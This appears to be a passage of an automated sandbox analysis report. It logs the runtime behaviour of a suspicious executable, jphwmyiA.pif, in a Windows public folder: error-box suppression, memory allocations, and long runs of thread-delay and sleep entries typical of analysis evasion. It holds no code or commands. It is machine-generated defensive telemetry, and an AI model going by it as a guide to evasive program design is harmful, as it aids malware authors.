Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\Public\Libraries\jphwmyiA.pif	Memory allocated: 24FC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Memory allocated: 25420000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Memory allocated: 25160000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Memory allocated: 299D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Memory allocated: 2A1F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Memory allocated: 29EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Memory allocated: 1B070000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Memory allocated: 1B5B0000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Memory allocated: 1B100000 memory reserve \| memory write watch

Source: C:\Users\Public\Libraries\jphwmyiA.pif

3_2_004019F0

Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599419	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599187	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598594	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598042	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597391	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597062	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596734	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596625	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596187	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595415	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595300	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594977	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594874	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594642	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594529	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594419	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594311	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599515	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599382	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599281	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599171	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599055	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598838	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598729	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598617	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598508	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598395	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598269	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598145	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597900	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597776	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597630	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597037	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596720	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596545	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596411	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596248	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596086	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595880	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595607	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595493	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595380	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595256	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595122	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595013	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594903	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594794	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594670	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594559	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594450	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594341	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594231	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594122	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594013	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593903	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593794	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593685	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593575	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593466	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593356	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593246	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593138	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593028	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 592919	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 592810	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 592700	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 592591	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 592481	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 592372	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 592263	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599875
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599765
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599656
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599547
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599437
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599328
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599217
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599109
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599000
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598890
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598781
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598672
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598547
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598437
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598328
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598218
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598109
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598000
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597890
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597781
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597672
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597547
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597437
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597328
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597218
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597109
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597000
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596890
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596781
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596672
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596547
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596437
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596328
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596218
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596109
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596000
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595890
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595781
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595672
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595547
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595437
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595315
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595108
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594995
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594890
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594781
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594672
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594547
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594437

Source: C:\Users\Public\Libraries\jphwmyiA.pif	Window / User API: threadDelayed 7005	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Window / User API: threadDelayed 2845	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Window / User API: foregroundWindowGot 1773	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Window / User API: threadDelayed 3925	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Window / User API: threadDelayed 5868	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Window / User API: foregroundWindowGot 1757	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Window / User API: threadDelayed 2380
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Window / User API: threadDelayed 7470
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Window / User API: foregroundWindowGot 1767

Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6836	Thread sleep count: 7005 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6836	Thread sleep count: 2845 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -599531s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -599419s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -599297s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -599187s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -599078s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -598828s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -598719s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -598594s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -598484s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -598375s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -598265s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -598156s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -598042s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -597750s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -597609s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -597500s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -597391s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -597281s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -597172s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -597062s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -596953s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -596844s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -596734s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -596625s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -596516s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -596406s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -596297s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -596187s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -596078s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -595969s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -595859s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -595750s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -595641s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -595531s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -595415s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -595300s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -595094s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -594977s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -594874s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -594765s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -594642s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -594529s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -594419s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 6760	Thread sleep time: -594311s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -34126476536362649s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -599515s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -599382s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -599281s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -599171s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -599055s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -598953s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -598838s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -598729s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -598617s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -598508s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -598395s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -598269s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -598145s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -597900s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -597776s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -597630s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -597484s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -597037s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -596720s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -596545s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -596411s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -596248s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -596086s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -595880s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -595607s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -595493s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -595380s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -595256s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -595122s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -595013s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -594903s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -594794s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -594670s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -594559s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -594450s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -594341s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -594231s >= -30000s	Jump to behavior
